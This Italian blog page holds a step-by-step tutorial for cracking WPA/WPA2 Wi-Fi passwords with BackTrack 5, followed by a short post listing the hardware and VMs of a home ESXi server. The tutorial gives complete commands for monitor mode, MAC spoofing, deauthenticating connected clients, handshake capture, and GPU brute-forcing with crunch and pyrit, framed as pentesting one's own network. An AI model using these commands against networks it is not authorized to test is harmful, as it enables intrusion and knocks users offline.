Argomenti

domenica 25 settembre 2011

Attaccare WPA/WPA2 con Back|Track 5 (CPU e CUDA) ITA


Guida : Attaccare reti wifi WPA/WPA2 con Back|Track 5 (CPU e CUDA)


Basato su: http://samiux.blogspot.com/2011/05/howto-wpawpa2-cracking-with-backtrack-5.html

Attenzione: Non operare su reti wifi senza autorizzazione.
Lo scopo di questa guida è fornire una conoscienza della sicurezza delle proprie reti.

A livello aziendale, una prova di attacco alla propria rete (penetration - testing) è un’ottima attività per sicurity - hardening.
Si può vedere infatti nell’articolo, nel cado del wpa/wpa2 che una password complessa, non necessariamente molto lunga, diventa quasi impossibile da craccare.



(A) Solo CPU / scheda grafica generica

Passo 1 :

airmon-ng

Se la vostra scheda di rete viene identificata, il risultato dovrebbe essere tipo:

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Passo 2 :

airmon-ng start wlan0

Questo comando fa partire la vostra scheda wifi in modalità “monitor”  (indispensabile).
A questo punto, la nostra nuova scheda di rete virtuale mon0, è in grado di catturare tutti i pacchetti da e verso l’ap.
Se la scheda wifi non sopporta la modalità monitor/promisqua non vi conviene impazzire cercando i driver.
Con una chiavetta wifi da 10-12 euro risolvete al volo.

Passo 3 (Opzionale cambio mac) :

E’ possibile volendo, cambiare l’indirizzo fisico della scheda mon0 (mac address)

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Passo 4 :

airodump-ng mon0

Airdump inizia a catturare alcuni pacchetti.
Dopo alcuni secondi premere "Ctrl+c" per fermare il programma.

Passo 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

Dove:   -c è il canale
-w è il file da scrivere
            --bssid is the BSSID

Per determinare il BSSID vi sono vari tool.
Su Back-track 5 si puo trovare “GERIX” una GUI per aircrack che rende semplici molte cose.

A questo punto, continuiamo a catturare pacchetti finchè un client si autentica.

Passo 6 :

Se siamo abbastanza vicini all’AP e c’è un client connesso, si possono mandare dei segnali di deautenticazione e obbligarlo ad andare per un po’ off-line.

In un nuovo terminale (mentre airdump sta catturando)

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:38:72:36:45:24 mon0

Dove:  -a è il BSSID
       -c è il mac address del client connesso (si vede nel terminale di airdump)

Dopo alcuni secondo il client torna on-line e a quel punto airdump cattura l’handshake.

A questo punto possiamo fermare il programma.
Il crack della rete viene fatto off-line.

Passo 7 :

Possiamo usare John the Ripper come un dizionario per crackare la password WPA/WP2.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Passo 8 (Opzionale) :

Anzichè John the Ripper come dizionario, si può usare Crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

Dove 8 16 è la lunghezza della passwordis (da 8 caratteri a 16 caratteri).


(B) Con scheda grafica nVidia con CUDA

Se si dispone di una scheda grafica nVidia con CUDA, è possibile usare pyrit per craccare la password con crunch.
I passi da 1 a 6 servono per catturare il pacchetto handshake da craccare.
Seguire i seguenti passi per utilizzare cuda.


Passo 9 :

Installiamo le librerie necessarie:
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Passo 10 :

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

Passo 11 :

http://code.google.com/p/pyrit/downloads/list

Scaricare pyrit e cpyrit-cuda

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Passo 12:

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

Dove 8 16 è la lunghezza della passwordis (da 8 caratteri a 16 caratteri).

Passo 13 (Opzionale) :

Se si presenta un errore leggendo wpacrack-01.cap eseguire:

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough


Passo 14 :

Risultato:

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.

Note:

Se si dispone di una nVidia GeForce GTX460 (336 CUDA cores), il sistema dovrebbe arrivare a 17,000 passwords al secondo

Per testare se la scheda wireless (sia USB che PCI-eo PCI) può fare injection :

airodump-ng mon0

Aprire un altro terminale

aireplay-ng -9 mon0

Per vedere se pyrit funziona sul tuo sistema:

pyrit list_cores

venerdì 16 settembre 2011

All-in-one Micro Server vmware ESXi 5 - DQ57TM


Micro Server assemblato!





Hardware
- Mainboard Micro ATX Intel® Desktop Board DQ57TM
- Case Antec NSK 1380 (350W)
- 4GB RAM DDR3 (2x 2GB) dual channel
- 2X HDD 250GB SATA (mid range)
- CPU Intel Core i3 550 @ 3.2Ghz
- 2X Network Interface (Integrated LAN + PCI Intel Pro 1000)


Main S.O. (hypervisor)
VMware ESXi 5.0 – the new release of the thinnest, most advanced virtualization hypervisor.

VM S.O.
- Windows Server 2008 R2 Foundation (Max 15 Users) - 3.5GB ram and 1NIC
- pfSense - Open Source FreeBSD based firewall - 256MB ram and 2NIC


Virtual Switch:
VM Network - connected to NIC0 (integrated) for LAN
WAN - connected to NIC1 (PCI Card) for WAN












Cerca nel blog